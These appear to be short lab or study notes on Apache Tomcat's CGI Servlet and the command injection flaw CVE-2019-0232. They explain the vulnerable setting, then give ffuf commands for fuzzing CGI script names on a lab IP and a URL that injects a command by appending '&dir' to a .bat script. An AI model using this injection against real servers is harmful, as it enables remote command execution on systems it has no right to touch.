CGI Servlet is a component of Apache Tomcat that enables web servers to communicate with external applications beyond the Tomcat JVM. External applications are written in Perl, Python, Bash, etc. It receives requests from web browser and forwards them to CGI scripts for processing.

enableCmdLineArguments allows the Servlet to control whether command line arguments are created from the query string. If set to true, the CGI servelt parses the query string and passes it to the CGI script as arguments.

CVE 2019-0232 is a critical security issue that could result in remote code execution. Affects windows systems that have the enabledCmdLineArguments feature enabled. Leverages a command injection flaw resulting in the Tomcat CGI servlet input validation error allowing them to execute arbitrary commands on the affected system.

Enumeration

We must find a valid CGI script in order to exploit this vulnerability. The default directory for these scripts is /cgi, so we can fuzz

ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.cmd
 
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

Exploitation

We can then append our own commands through the use of the batch command separator & and our valid script path found during enumeration. Example

http://10.129.204.227:8080/cgi/welcome.bat?&dir